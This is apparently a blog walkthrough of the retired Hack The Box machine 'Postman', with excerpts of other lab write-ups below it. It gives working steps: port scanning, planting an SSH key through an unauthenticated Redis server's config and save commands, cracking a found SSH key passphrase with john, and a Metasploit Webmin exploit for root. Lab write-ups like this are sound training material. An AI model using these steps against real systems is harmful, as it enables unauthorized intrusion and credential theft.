Skip to main content

HackTheBox -Retired - Postman


HackTheBox -Retired - Postman

Recon:

As always I start with a simple up/down scan on all TCP ports
# nmap -T4 -p- -oX /root/Desktop/HTB/postman/nmapb.xml 10.10.10.160

Then I convert the XML to HTML

Xsltproc /root/desktop/HTB/postman/nmapb.xml -o /root/Desktop/HTB/postman/nmapb.html


Ok we see port 22,80,6379 and 1000

Lets scan just those ports with the -A to finger os/services

Nmap -T4 -p 22,80, 6379,10000 -oX /root/Desktop/HTB/postman/nmapf.xml

Convert that to html too

Xsltproc /root/Desktop/HTB/postman/nmapf.xml -o /root/Desktop/HTB/postman/nmpaf.html




Ok we got SSH (Openssh 7.6p1) on port 22
HTTP ( Apache 2.4.29) on port 80
REDIS ( 4.0.9) on 6379
WEBMIN (1.910) on 10000

Let's see what's running on port 80


Just a generic page with not much to poke at

Let's run dirb at port 80 and see what we see

It found some directories to poke around in /css /fonts /images /js and 
/Uploads

I really like finding dir's that are called uploads, usually that means there is someway to upload a file to the server…… 



What about port 1000 webmin?


Its running in ssl


Needs creds..

Stephen Rannazzisi Kevin GIF by HULU
Let's do a little digging on the Redis service.. So what is Redis?


Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache and message broker.

It has a cli


Let's install it

Sudo apt-get install redis

Let's see if we can connect up to it


Cool, we can… so what can we do?





Exploit:



When I come across a tool I don't have any experience with I like to google the tools name then pentest to see what are the juicy bits



Inserting our own ssh key on to the server to connect up..

Sounds worth a try.




Let's start with Generating our SSH keys

ssh-keygen -t rsa



Now we are going to put some padding around the pub key just like they blog
(echo -e "\n\n"; cat ./keyz.pub; echo -e "\n\n") > pubkey.txt

Now we need to move the file over to redis

cat ./pubkey.txt | redis-cli -h postman.htb -x set crackit

Connect backup to redis to save our file

redis-cli -h postman.htb

Now this part took a while to find out where to save the pub key.

When connected up we were in this directory


/var/lib/redis

I tried setting the dir to /home.. But got permission denied.

But what if this file path is the home directory for a user named redis… if we add our file here in .ssh maybe we can get our shell?
config set dir /var/lib/redis/.ssh
config set dbfilename "authorized_keys"
save

This should take the file we put in redis and save it as a file named "authorized_keys" in the /.ssh folder


Now we can hopefully ssh in as redis
 ssh -i ./keyz redis@postman.htb

Alright we have a foothold as redis..

Let's copy over LinEnum.sh to see if we can find any path for escalation.



Check this out

A backup of a key in a folder we might have access to?





We got a private key… I just used the clipboard to copy it locally to my machine
I changed the permission to only my user so SSH wouldn't complain about it being too open.

I save it as MattPriv

 

There's a passphrase… no problem we can get rid of that..


We can use ssh2john to format the key to a format that john likes


/usr/share/john/ssh2john.py  ./MattPriv > johnmattpriv.txt


Now we just need to feed it to john

 sudo john --wordlist=/home/circusmonkey/rockyou.txt --format=SSH ./johnmattpriv.txt




That didn't take long computer2008 is the password for the SSH key


It's not letting us SSH with that password… 
30 Rock GIF


What about that webmin thing we found earlier? It needed creds… hopefully Matt re-uses passwords

An guess what?

He did, got in with Matt computer2008.


Googling around I found this authenticated RCE which if it works will give us root on the box..


Let's try it

Fire up metasploit and search webmin

Use 3

Set our options

We need to set the password, username, rhosts, lhosts and set the SSL flags to True since our victim is using ssl   *** you might see i mistyped the password option.. I Fixed that after metasploit complained


We are in as root

Let's just grab our flags now


The shell is not working great


Did the command "Shell" on the session to get a better shell


All done

# pwd 
pwd
/home/Matt
# cat user.txt
cat user.txt
517a***************************
# cat /root/root.txt
cat /root/root.txt
a257*******************************

Easy Office Space GIF

Labels:

Comments

Post a Comment

Popular posts from this blog

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar...
Post a Comment
Read more

Hack The Box - Retired - Laboratory

HackTheBox - Laboratory - Retired Starting off with a quick scan using threader6000 /opt/threader3000/threader6000.py 10.10.10.216 Ports 22,80,443 came back. Run nmap against these ports. nmap -p22,80,443 -sV -sC -T4 -Pn -oN 10.10.10.216 10.10.10.216 nmap -p22,80,443 -sV -sC -Pn -T4 -oN 10.10.10.216 10.10.10.216 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-13 17:43 EDT Nmap scan report for laboratory.htb (10.10.10.216) Host is up (0.060s latency). PORT    STATE SERVICE  VERSION 22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   3072 25:ba:64:8f:79:9d:5d:95:97:2c:1b:b2:5e:9b:55:0d (RSA) |   256 28:00:89:05:55:f9:a2:ea:3c:7d:70:ea:4d:ea:60:0f (ECDSA) |_  256 77:20:ff:e9:46:c0:68:92:1a:0b:21:29:d1:53:aa:87 (ED25519) 80/tcp  open  http     Apache httpd 2.4.41 |_...
Post a Comment
Read more

A collection of online Security CTF and Learning sites

 Hellbound Hackers    Embedded Security CTF Arizona Cyber Warfare Range Over The Wire - Bandit Pico CTF 2018 Hack The Box.eu Root Me: Challenges/Forensic RingZero CTF Vulnerable By Design - Vulnerable VMs Murder Mystery SQL Challenge Incident Response Challenge Authentication Lab Walkthroughs Defcon CTF Archives Matrix Holiday Hack Cyber Defenders | Blue Team and CTF Crypto Hack - learning Crypto Video Learning Zero to Hero Pentesting by The Cyber Mentor
Post a Comment
Read more